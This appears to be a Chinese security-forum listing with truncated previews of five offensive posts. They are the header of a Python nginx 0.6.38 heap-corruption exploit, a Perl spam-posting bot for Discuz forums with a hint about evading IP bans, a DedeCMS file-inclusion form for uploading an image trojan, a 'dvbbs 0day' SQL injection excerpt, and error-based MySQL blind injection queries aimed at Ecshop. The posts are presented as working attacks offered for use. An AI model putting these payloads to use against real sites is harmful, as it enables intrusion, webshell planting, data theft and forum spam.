【Exp】Nginx v0.6.38 Heap Corruption Exploit

Nginx v0.6.38 Heap Corruption Exploit: #!/usr/bin/env python  #  # Exploit Title: nginx heap corruption  # Date: 08/26/2010  # Author: aaron conole <[email]apconole@yahoo.com[/email]>  # Software Link: [url]http://nginx.org/download/nginx-0.6.38.tar.gz[/url]  # Version: <= 0.6.38, <= 0.7.61  # Tested on: BT4R1 running nginx 0.6.38 locally  # CVE: 2009-2629  #  # note: this was written and tested against BT4. This means it's an  #       intel x86 setup (ie: offsets

【PHP】Discuz 发贴机器人源码

标题:[原创] Discuz 发贴机器人源码,补充在指定楼层发帖回复 内容: #!/usr/bin/perl use strict; use warnings; use LWP; use HTTP::Cookies; my $browser=LWP::UserAgent->new; my $new_agent='Mozilla/5.0'; $browser->agent($new_agent); #Proxy:如果你的IP封了,呵呵! #$browser->proxy('http','your ip'); $browser->cookie_jar(HTTP::Cookies->new( 'file'=>'im286.lwp', 'autosave'=>1)); push @{$browser->requests_redirectable},"POST";

【转载】DedeCmsV5.6 本地包含里的上传漏洞

之前就发现了这本地包含的利用方法: <form action="http://localhost:8090/plus/carbuyaction.php?dopost=return&action=xxx&code=../../include/dialog/select_soft_post" method="post" enctype="multipart/form-data" name="QuickSearch" id="QuickSearch"> <input type="hidden" name="newname" value="1.asa"> <input type="file" name="uploadfile"> <input type="submit" value="搜索" name="QuickSearchBtn"> </form> 上传一个图片木马(只改后辍名为图片类型就行),即可在

【转载】dvbbs php2.0 的几处 0day

作者:T00ls 核心成员 Xhm1n9 时间:2010.8.19 1:joinvipgroup.php  //注入 function up_vipuser(){ global $lang,$db,$dv,$userid,$userinfo,$vipgroupuser; $groupid=$_POST['vipgroupid']; $btype=$_POST['Btype']; $vipmoney=$_POST['vipmoney']; $vipticket=$_POST['vipticket']; if($groupid==0 or $vipmoney<0 or $vipticket<0){echo "@@";    showmsg($lang['join.info4']);   

【转载】Ecshop lib_common.php注入

昨天无意间读到:     http://www.packetstormsecurity.org/papers/database/PT-devteev-FAST-blind-SQL-Injection.txt 发现原来可以这样注入:     MySQL >= 5.0:         执行:             select 1,2 union select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;         或:             select 1 and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);         会报错:             Duplicate entry '5.1.30-community1' for key